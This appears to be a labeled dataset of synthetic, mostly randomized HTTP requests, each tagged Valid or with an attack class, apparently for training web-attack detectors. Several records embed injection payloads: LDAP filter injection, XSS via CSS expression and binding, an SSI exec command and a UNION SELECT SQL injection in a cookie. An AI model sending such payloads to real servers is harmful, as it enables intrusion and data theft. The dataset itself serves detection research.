Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 671477546416397721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3298
Start - Id: 4554
class: Valid
POST /nsmustipzr/K8documentgL1pselectp4@/mNEaur69e/pelttdb7foesteeit/foaete7Vumnnnhat/5njx/nhdyeclhheA/iKrAw86tSreyupoado/mUt7IGo-B.htm? HTTP/1.1
Content-Length: 118
Content-Language: ei2hdao5
Content-Encoding: identity
Content-Location: /tnna/resGcotm.exe
Content-MD5: ZWJsbnJocjRjNmlQeXJlZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Dec 09 17:31:12 UTC
Last-Modified: Mon, 01 Aug 05 15:41:47 GMT
Host: 170.231.84.229
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: fwh-eerOh, h-or;q=0.1, aweaqt-stho9do
Cache-Control: max-stale
Client-ip: 57.183.252.106
Cookie: w1vleamac9pcEew=aoSabd&shttpn\ot%y;s1idsfgvvEop=2tdthlEsE6si;v0hPuXperlxk7=il;heh=wnmi4de
Cookie2: $Version="1"
Date: Sun, 17 Jul 05 15:44:02 UTC
ETag: W/"KMSjlmE4P3UJ0tUAT_2"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Mon, 16 Jun 08 22:30:42 GMT
If-Unmodified-Since: Thu, 09 Apr 09 17:09:09 UTC
If-Match: "1T5BrFpsza0b8IUBJYOy"
If-None-Match: *
If-Range: Tue, 05 Aug 08 22:14:06 UTC
Max-Forwards: 793
MIME-Version: 8.1
Pragma: oorie=czo
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: Digest nc=CA1e9F6D
Range: -1538,010-
Referer: /croy.conf
TE: gzip
Trailer: Expect
User-Agent: Mozilla/5.0 (compatible; qdjrqRrz; Windows NT; m1iat; atsoBtne7m; oFf7i4n)
UA-CPU: MIPS
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3467x636
Via: 4.7 124.197.141.118, FTP/1.6 www.snorn.png
Transfer-Encoding: compress
Upgrade: 5oSf/8.1, asfrl/0.4, ageuy/4.8
Warning: 589 28.189.6.206 "nrrp" "Sun, 11 Sep 05 11:50:25 GMT"
X-Forwarded-For: 244.206.80.136
X-Serial-Number: 8388631449289131034
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kpdSkdsar=Eetctidmftp&df9i7al7=w&naIelwin=ematI0Ygo3co&p3eboosZnW=9304&iiBh3vdrvab3o=4262230368&p8MrWgjKg=i_Op7@QOzb

End - Id: 4554
Start - Id: 38108
class: LdapInjection
GET /.8styleOfZbY2q_rL/i7iw4w5laPZ8/bleozTnmtrs.cgi?ligeeInteeOf=eEhote&Dczuamyoen=tus%29%28++%7C++++%28aW%3D*%29&ii3wenLriULcr=r2hto89rcqteoE&z1g-=eqsod23k0iEsu3yr&uuTin1h=801&huhAonenOIXl1=221&Mra=g9gando+0d%28&0l=iao9tai HTTP/1.1
Host: www.He3srsD.uk:80
Connection: hu1vb
Accept: */*;q=0.0
Accept-Charset: x-mac-greek, hz-gb-2312, x-mac-icelandic;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 223.239.75.68
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="3"
Date: Thu, 02 Oct 08 12:42:07 CET
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: 100-continue
From: gnhjruh@dteigtlw.biz
If-Modified-Since: Thu, 09 Jul 09 07:04:49 GMT
If-Unmodified-Since: Mon, 08 Oct 07 01:50:31 GMT
If-Match: "-do@nSPAOBoysd0"
If-None-Match: *
If-Range: Mon, 20 Jun 05 12:46:55 UTC
Max-Forwards: 1
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: ntddnv dr9t=oezhv
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: /g6a2/eneestaa/lfnrSmS.swf
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: uyitA (h54Zopu; dxDq7EUgg; 74NeWradzJ; t637LSspAm)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: HTTP/3.2 149.27.137.253
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 992 186.91.149.99:23 "TrsuteIBc" 
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38108
Start - Id: 33676
class: Valid
POST /etesiaNIestn0lusrmon/hpBV7locationpasswd./104P0sNu7F4oHy/ttnn.png? HTTP/1.0
Content-Length: 150
Content-Language: i,la
Content-Encoding: compress
Content-Location: http://www.ro1Ot.uk/ni4Iv/q9s5le/6kdre/1owhi.fgf
Content-MD5: Mml6SGVkaW80ZXdpdDdPYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 May 06 15:34:21 UTC
Last-Modified: Sun, 23 Jul 06 10:39:16 UTC
Host: 200.183.117.43
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.1
Accept-Encoding: 
Accept-Language: aoesriU8-iebas
Cache-Control: n18stmw='nhFRrn'
Client-ip: 106.244.251.170
Cookie: hSya=n4kiZsNaU;ann=dpglil$;tto=E9;743e=3989;qH0bgB=pRtCDzOh
Cookie2: $Version="347"
Date: Sun, 21 May 06 15:51:13 CET
ETag: "v.EEqhiT8j78v4H"
Expect: 6la9enoA=yyteo
From: EWghrs@bKfdtalaoe.it
If-Modified-Since: Sun, 30 Jan 05 07:19:59 CET
If-Unmodified-Since: Tue, 18 May 04 21:40:09 GMT
If-Match: "QrXVvIuBqA_Wnk7Ypq8n"
If-None-Match: *
If-Range: *
Max-Forwards: 9789
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: s6eb L9Tta=ahuaoli
Authorization: Basic Y2huZjppb2hvbGs=
Range: 77-,-7604
Referer: http://Dpaeat9.be/vhcreh/rOn6on/o7ta3od/vteai.exe
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 0.0; hh-kr; rv:3.0.3) Gecko/98097434
UA-CPU: PowerPC
UA-Disp: 4395,796,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3257x6651
Via: 6.2 165.21.140.180:926
Transfer-Encoding: opr0U
Upgrade: zssryR/6.5, ijnS/5.1, dEsf/4.2, Wss/3.6, Ktea/4.4
Warning: 695 51.99.15.101 "em1b2rit6q" "Fri, 27 Feb 04 19:06:33 CET"
X-Forwarded-For: 199.124.172.154
X-Serial-Number: 695598853636
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

nwi=fHi&coeibkweua=e-&7sehesEh=e=b4 hae&neceaeTafe=ozm8eStar&r8ualOthkmnz=N%/0l(htaccesme&cxQcopyg1xmlMii6=48276984&tso=ntt&HyZZFivselectZ=908

End - Id: 33676
Start - Id: 14819
class: Valid
GET /stsethtIt/NoMq/RreplacewmochamochalwOWTunion_f/kmh2ymfi2la8b5/ZVnph-servicesWopt/4aegereor/iI9NdcNVCHcii/ao2kaedfsv8Hiabe9eeo.jpeg?eE0bcz=rsrt&matoxeErante=995653&-6PPmetaKupdateHkw=4205&necee=797702&et=execiQfesayli5+e&ttao=rsdilntmi HTTP/1.1
Host: 25.104.11.225
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-tw
Accept-Encoding: *
Accept-Language: ye8-snstu;q=0.3
Cache-Control: only-if-cached
Client-ip: 237.183.88.12
Cookie: iwoiae8o=dsO8nc/mf3GY;.M_DZ.IAWT=167205
Cookie2: $Version="50"
Date: Sat, 22 May 04 18:46:36 CET
ETag: W/"tlRuWKKvkVBc8v6"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Tue, 09 Mar 10 09:39:09 GMT
If-Unmodified-Since: Sat, 24 Jun 06 17:04:48 GMT
If-Match: *
If-None-Match: "Wi2@zuqsM7Tx3nL"
If-Range: ".jMEGjbQlXholOpa-Og"
Max-Forwards: 9
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: gresSi t3uet=opnt
Authorization: Basic aWRuSW9peTpzYWFpTjBuYw==
Range: 43-,13433-8
Referer: /eartbto.wmn
TE: deflate
Trailer: Date
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 5.7; pn-zc; rv:1.7.5) Gecko/27310734
UA-CPU: MIPS
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1451x6345
Via: 8.2 45.41.121.181, aen5D/1.0 www.t9Lns2.jpg, 2.3 1.61.41.125:94
Transfer-Encoding: compress
Upgrade: altl/2.2
Warning: 387 165.171.90.131 "hiaiten8hm8" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14819
Start - Id: 47816
class: XSS
GET /lIhhrh/orf/stdinBVdR38BGFH/nc-BF7DX5ehkeTC/fireoazasbq.css?f6qo6lfi5tm=trpanei&aesye=e4execlc9ef3pri&eewetlTit2=7&au2dr0wiayipsl=Rmfis&eowv=hro+++++style%3Dleft%3Aexpression%28alert++%28kot.ntos%29%29&uV.GDI.Gor=%3Cio7c&hi=9PXDCDOSZ&DCwp-e_lII=0296019&S3golleurg=resyecntR5ey&KEz.YSRwbetweenlGF=n6f&aodroogr0ytgs4=709108333&aii5=weeJ9oyn&TRDxsDbgsound4NDf4=sDNM&etUWZKDBB=subsxrccEictswamo HTTP/1.0
Host: 239.70.214.73
Connection: keep-alive
Accept: audio/basic;q=0.1, audio/*;q=0.1
Accept-Charset: windows-1252, iso-10646-ucs-2;q=0.7, x-mac-japanese
Accept-Encoding: *
Accept-Language: mo-Ai;q=0.6
Cache-Control: max-age=2
Client-ip: 203.124.10.83
Cookie: jlnHmg=nescma1zrolinkue;L-1RLzMO@Y=>mo;HU0RXG@=twaeNwslhfoe
Cookie2: $Version="0"
Date: Tue, 27 Jan 04 22:05:47 UTC
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: fiAcxfzm@u71in42.ch
If-Modified-Since: Fri, 21 Dec 07 16:17:34 CET
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: Tue, 22 Mar 05 24:05:01 CET
Max-Forwards: 629
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/g5nxxi/tLEiado/9dOtoth5/deavlru/bosadp.aspx
Authorization: Digest response="D2feD746C9Aca9aD3A9e6aACdEE572A9"
Range: 2820-37,-5180,81-
Referer: http://ssogto.be/hubpiata/rtsesud.jpg
TE: gzip;q=0.1
Trailer: TE
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 6.3; nc-ye; rv:7.1.5) Gecko/70292677
UA-CPU: x86
UA-Disp: 9028,3177,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 907x206
Via: 3.6 www.keAeda.tiff
Transfer-Encoding: identity
Upgrade: aRsepf/2.8
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 7313347
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47816
Start - Id: 20939
class: Valid
GET /lm/ehtynstnliwntoVEp/z2aeahE4tarr/tmTeMdNNpRTYyZK/wdPG/iGHZxe0BMC/aifdGah9h3ttsfwaqhYs.htm?xdIc5dec=aeoorssxrzceerey&qrn=mtdihrIaccepts+stec%26r&eaoeiv3hestrts=rIn+na HTTP/1.0
Host: www.eoamfbmose.ch
Connection: close
Accept: application/*, text/*;q=0.5, application/x-tar;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2751
Client-ip: 241.218.51.172
Cookie: ltnmd=059;GzjLJ=jtidracceptt/;ET9OfiLtKxd='d;z56nmueusTvtt=t x%Vrats;esutp=r;ee4o=Lrwda
Cookie2: $Version="195"
Date: Sat, 28 Jun 08 14:17:07 CET
ETag: W/"@SwYjNEfjZMf_Kh4ulGE"
Expect: sbmyjz=nf9bml;nyae
From: d011d@jsutlttae.it
If-Modified-Since: Tue, 24 Jan 06 05:04:54 CET
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: "fuzcjQOvwRlxBHarH1"
If-None-Match: "yQQiE1UwvA45b3kR"
If-Range: "_ltRZ4Orx.c4zq-uNrJ"
Max-Forwards: 27
MIME-Version: 3.1
Pragma: he='o0a'
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: NTLM ZXJudHRwbGRucGV0d3JtdWh0dG0zbmVhMW5sd2F2MG50RDB1bHRsb2Vl
Range: 8-0,694610-
Referer: /hsp6naj2.tiff
TE: chunked;q=0.7,gzip;q=0.2,trailers
Trailer: User-Agent
User-Agent: ss3o2jkpP (le3qalQqt.)
UA-CPU: x86
UA-Disp: 0973,375,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 308x307
Via: FTP/2.2 www.i41kehrn.jpg
Transfer-Encoding: deflate
Upgrade: de7/0.8, frcre/7.5
Warning: 328 40.44.180.235:467 "waPoatoStfremrctoitm" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20939
Start - Id: 1394
class: Valid
GET /tUXRJ/uatelzirO6ena/nyW2Rl2gryUEg9/hnrE/SxYsZ/g7JI1SOaDO31V@7/Sir3h15UUs2T.sh?dTwe=l7_eMqBPi8e&4prsp=4&eyivtaxhscnga9a=7 HTTP/1.0
Host: 114.6.87.90
Connection: pIDm3
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: Ui-tRn, hhaet-Mqsbmi, Y-em, hssahez-sRh
Cache-Control: no-transform
Client-ip: 66.221.67.104
Cookie: rtosse=eso|anaH;e3rl=rSj27einte2;eoc8id=edeifbbTnnsweSa;ngO=oU@4BGz8cXuE
Cookie2: $Version="08"
Date: Thu, 14 Jun 07 04:41:41 GMT
ETag: W/"EzbiYuN8PW38Neaol2"
Expect: 100-continue
From: etIb71s@I2gK.it
If-Modified-Since: Sat, 13 Jan 07 17:09:17 CET
If-Unmodified-Since: Mon, 26 Dec 05 11:14:50 CET
If-Match: "8Kl1KroT7kAnI_Da"
If-None-Match: *
If-Range: *
Max-Forwards: 11
MIME-Version: 4.2
Pragma: fpvui8jm=necY
Proxy-Authorization: peo1 et1n=eacseu
Authorization: Digest nonce
Range: 373155-704,-1740,72564-298
Referer: http://nfEgFee.gov/t4se3h/67ettsiH/wtalt7s.txt
TE: trailers,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 3.4; wM-ht; rv:8.7.9) Gecko/95314057
UA-CPU: x86
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 238x900
Via: 1.0 43.99.238.176, 5.3 98.249.240.105
Transfer-Encoding: gzip
Upgrade: bhgp/1.7
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 123.28.90.45
X-Serial-Number: 5490878161111
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1394
Start - Id: 1459
class: Valid
GET /g-QZ/5Tarye9wd5vtasoisle/wdo6epap5ncBd/Xshserow0mSyt7lr4ra/iKxPM_nYNPm9RHoF/laydtyfn/o31vTrMT2twMX_yS9/eaieLl2o.gif?cane=ry&yctth=dsn%7E&tsewEI3=sRq3tKfX&eono1hgtswiiviu=898&hj1eoba=ee3aGH0ol&7dtlDnodeY9Qo=pfat&Mynr=kZTyQ.qRVxs HTTP/1.0
Host: www.8o123nhate.gov
Connection: close
Accept: application/*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate, identity, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 182.141.21.231
Cookie: 64=Sis&
Cookie2: $Version="5"
Date: Mon, 12 May 08 07:10:36 CET
ETag: "WG89NQNyO8y@F9D1y"
Expect: 100-continue
From: oOaeifaU@dedahe.st
If-Modified-Since: Fri, 20 Feb 09 09:15:43 UTC
If-Unmodified-Since: Sun, 06 Mar 05 15:20:18 GMT
If-Match: *
If-None-Match: "Wz5dGSNEfKia8Hk"
If-Range: *
Max-Forwards: 5
MIME-Version: 2.6
Pragma: mdie=nt
Proxy-Authorization: iUTNle deiuEMot=etidst
Authorization: Digest qop=rS7yoSnt
Range: -1
Referer: /5yGmt/kncds/vOdCtaem.php3
TE: trailers
Trailer: Pragma
User-Agent: mgajneb9g http://www.eaEhk.ch
UA-CPU: x86
UA-Disp: 0390,6600,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0275x4653
Via: HTTP/1.2 187.49.160.103, pfo/4.7 www.eyfTa.html, 2.9 214.35.150.252
Transfer-Encoding: gzip
Upgrade: kr1Di0/3.6, i6oen/5.3
Warning: 048 www.resetlo.js "j7eznorhohrr83qef4f" 
X-Forwarded-For: 102.122.203.235
X-Serial-Number: 8617636872722590
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1459
Start - Id: 40017
class: SSI
GET /et/okRjs-aLnN/sBQtJRWlVwx2mDQ@Ogl.mspx?oxRhfsmetbor1ER=93283&tdio0sendti=Bub&6KllLBYswK9=uu%29a&qsjswesOhRane=tcAth&deirxaldlbcson=ovitd1ujeeeshed&baIdn5t1ztt=oKD&Ewget8b=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2FAhg%2F1ltea%22+++++--%3E&46edEstS=3otYel3&wI4mmrsrsico=elCIG1Qq&OylyiLeTgetktt=%3Fto8a&8zaoe=limm HTTP/1.0
Host: 146.175.22.120
Connection: close
Accept: text/html;q=0.2, text/plain, image/gif;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.4, deflate;q=0.4, deflate, compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 186.147.250.219
Cookie: fonM=dbeun;7oefrniellldtmt= e;pi=u45F1BL;gPtfupdatediv-hXRMI=~0ex);euun3ph=7379231
Cookie2: $Version="063"
Date: Sun, 13 Nov 05 11:09:59 GMT
ETag: W/"M_ybmZVvZ2LN3u7elOw"
Expect: ieg6l
From: l1ahde@nablau.fr
If-Modified-Since: Tue, 07 Sep 04 04:49:01 UTC
If-Unmodified-Since: Fri, 09 Apr 10 13:59:57 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 167
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: rnefn thutlu0=teulA
Range: -382094,59133-7365
Referer: http://www.ltoe.fr/5afe.zip
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: slu58/6.0
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.2 255.233.43.117, HTTP/3.1 www.tsbith4e.html, 7.7 101.97.156.116
Transfer-Encoding: gzip
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40017
Start - Id: 41269
class: SqlInjection
GET /2rWUxUJCr203aHJM/d4OwugL/r729WAuqd.A/jaiTe/lTCbKgrt2mMW08FQy5Y/enugeihie/Ty@j-connectx/iKaXx.nsf?qvdee=window.openroS&scozsm1wmta=access_logufrIt%29vrYmwhereit%3C&4sswa=%3FonebtOsTtni HTTP/1.0
Host: www.hns8sFxe.uk
Connection: r3ryth
Accept: application/*;q=0.9, image/gif, application/*
Accept-Charset: windows-1252;q=0.5, iso-8859-6, koi8
Accept-Encoding: *
Accept-Language: eqge-e, ao-6heEhfr, 4ac-lc
Cache-Control: max-stale=5673
Client-ip: 154.221.49.133
Cookie: WOmV=93520966;Dsgqirgeemeeebo=4kt0;ErcYumcic=cs4VXzr8kJ;dsgm=bin=e;tte=leBsaZnujqhEraiiE;foG4inrdue='    )  UNION  ALL   SELECT     gT    ,    aoo    ,   maIqIt FROM  touy  WHERE    meylhwTi4 NOT    IN    ('ihAhsilI'    )     AND   schl4xhk4a  NOT    IN (   'wE')     AND     ''    =  '
Cookie2: $Version="418"
Date: Wed, 10 Jan 07 23:12:02 UTC
ETag: "rbZZs366AoTyrhxAFG"
Expect: oehsmNbr=td4gOaz
From: secaxaii@ljoAtaiiwf.de
If-Modified-Since: Sun, 06 Jun 04 08:18:08 CET
If-Unmodified-Since: Sat, 16 Sep 06 15:59:12 CET
If-Match: "Qwcam7u.bRggVSiZdr"
If-None-Match: "2@Ndthmz08Ubr115K"
If-Range: "o1rbqH6OZs@6JGfm5"
Max-Forwards: 4
MIME-Version: 2.4
Pragma: 7s=h5lecu
Proxy-Authorization: Digest cnonce="4dmgm"
Authorization: ihnldo 8hla=hsixbd
Range: -78675,-73,41-
Referer: http://www.Tuct.st/6moo/oc00aD/gitfyrb0/rooontat.php3
TE: gzip,trailers,chunked;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (compatible; MSIE 6.8; Win 9x; lsvNtdwoCe)
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 557x1445
Via: rp9t2/6.4 www.7tcbxiac.js, 8.5 www.asseetb.css
Transfer-Encoding: gzip
Upgrade: oialw/6.4, ecoFh/5.7, 2gE/1.6, fusedj/1.9, mxspi/7.0
Warning: 292 236.224.211.136 "whsgbaeh2iSTibeIwt" "Tue, 02 Sep 08 21:32:22 GMT"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 2028120
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41269
Start - Id: 473
class: Valid
GET /tpy/aiH6OTa7Wc/e6UN/seny5No6uYilzlsroi/tbjJ8Mr3/erdaodi/hmsirZ8lWE/ingKi.shtml?lste5inor5i=wp-e%24gn%3Ct+rcebs&l5i7snhealEhhh=af.4WfKY.3Ph&t2Tetc=703936&ivdlD=644238512&nNdlXs9la8a=-I3dthd%3Chr%25&CYmxOftp=o2WRJeam&xlI944M=7sgu&7mEklsxae7sti=1gc&div6idxE=od&.FBEum_8cPb=yhP4PoK.t&alm4saa3li=%5Denm&sujnceseynEme=93Drrem HTTP/1.1
Host: 228.170.250.0
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-5;q=0.0, euc-jp, iso-8859-1, windows-1254;q=0.9
Accept-Encoding: deflate, compress, identity;q=0.4, identity, identity
Accept-Language: *;q=0.4
Cache-Control: max-stale=93
Client-ip: 98.46.223.158
Cookie: e3qXtplJs2=tnixs1natr;dgr=mas;4eloe=twx
Cookie2: $Version="460"
Date: Sat, 18 Apr 09 15:41:26 UTC
ETag: "9V6PCjDGfn-VR_g__wb"
Expect: 9eenr=qiMlasE
From: oeicnnb@t32welnr5i.biz
If-Modified-Since: Thu, 01 Oct 09 11:23:03 UTC
If-Unmodified-Since: Sun, 19 Jul 09 04:04:39 CET
If-Match: "PTSWRFxl406MFMllg37s"
If-None-Match: *
If-Range: Wed, 11 Oct 06 06:29:21 GMT
Max-Forwards: 81
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM aG5pRmhlbmhyYXNsSTF5dGNhZXlvaXJybmVvZDkzcklpaWg5cG90YVNlbA==
Authorization: ezrvys j72ster=dee9nyif
Range: 37-,1-690004
Referer: http://iewd.biz/tilwP.msf
TE: gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: ns12oKqmBp http://www.yli9irr8.com
UA-CPU: StrongARM
UA-Disp: 506,620,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7413x7082
Via: 5.4 212.212.95.4, FTP/2.5 73.198.104.123
Transfer-Encoding: compress
Upgrade: vzvi/8.2
Warning: 976 148.134.175.140 "ftiyhn7Flr5m" "Sun, 28 Feb 10 03:59:16 CET"
X-Forwarded-For: 85.121.116.193
X-Serial-Number: 9170010950
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 473
Start - Id: 19945
class: Valid
GET /sL9PLnxSekmwKda1/nn5E1eeeewjh/eTzQs.Atk/6ntonalacIgonqsxen/9xbgsound79YzevalEsrcp/tnawstd.cgi? HTTP/1.0
Host: www.oetms.be
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.2, euc-kr, iso-2022-jp, x-mac-greek, euc-kr;q=0.2
Accept-Encoding: compress;q=0.8, deflate;q=0.1, gzip, compress, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 26.43.31.63
Cookie: TrsobtCk=4;enp=w ta<sdtlne n$maOdU8;tyre=vbscript3mshutdownlhamiesqy
Cookie2: $Version="64"
Date: Mon, 03 Mar 08 04:08:50 GMT
ETag: W/"FfY81ZOQ.rfJL@lZW"
Expect: 100-continue
From: eeruearo@0jdeseld5.de
If-Modified-Since: Mon, 26 Oct 09 12:00:05 GMT
If-Unmodified-Since: Fri, 09 Oct 09 12:44:55 CET
If-Match: "L3rHVEE7QVC8jP0"
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM NFNhZW5lZWk4ZU9lZXJzZWg3NnNvbjRiZXJuYmdiaW9pczBl
Authorization: Basic cmUwc206amVhdUI=
Range: -3850,54-
Referer: http://hiehn.com/rsSa/hkd1aen/Aesexl.txt
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 2.1; ia-hB; rv:9.2.3) Gecko/82686068
UA-CPU: Sparc
UA-Disp: 5017,145,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 756x2638
Via: HTTP/1.1 199.129.242.167, 0.7 188.75.171.125
Transfer-Encoding: gzip
Upgrade: 1e4/9.3, eielY/2.7, nearu0/5.9, qtc/5.6, ttot/4.4
Warning: 584 29.186.172.18:663 "aatB6aAprgMv02tqrt" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 21179
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19945
Start - Id: 47590
class: XSS
GET /rtqhpAaccess_logvTh2like/v2k.T-aEFzZlWZlog/eYfoi1ibnr9S/xxNhLP/rwindow.openXQEBrzJgkYsock_stream/yc7ftc8sb8XBmrrw/r1/d6Wi5uiGcwwnUejtc/ibyr2s.html?etweAoZlimelget=ot7e-Io&tr=oLf5F4znJZ&adm7b=%3Cdiv++style+++%3D+%22+++++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.neeninsi.com%2Fscript%2Frb.asmx%5D%29%3B+++++%22++++%3E&Z3zOncmdlsJselect=d6cl2ch%2Bimg56taupdate%3Fsu&wcydsa=dinputtT+&ti=xp_&en6o=96409190&riLe0leOhc=J1lOddZ8ota&pNIH=ieshutdowncsIobjectioa5&egpr=i%40KBG HTTP/1.0
Host: www.t5hploeo.net
Connection: keep-alive
Accept: application/*;q=0.5, image/*;q=0.4
Accept-Charset: isiri-3342, iso-8859-2;q=0.3, windows-1253;q=0.2, euc-tw, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 89.98.57.72
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Thu, 29 May 08 20:32:13 UTC
ETag: "_-rykg0hR4YVN2f-QVb"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Tue, 01 May 07 05:37:04 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: "NdR7AF0p89vmqDIw"
If-Range: *
Max-Forwards: 520
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=m2ta
Authorization: Basic dzJob2FjOmVpcmdFbnI=
Range: 849916-
Referer: http://www.ifruBae.cz/bic8g/sAqiG3fu/h0uome2.cgi
TE: chunked,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (X11; U; Linux i386 6.4; Mi-on; rv:8.7.6) Gecko/47148056
UA-CPU: StrongARM
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 924x017
Via: FTP/4.6 www.estph.gif, FTP/6.4 118.117.127.105:063
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47590
Start - Id: 37570
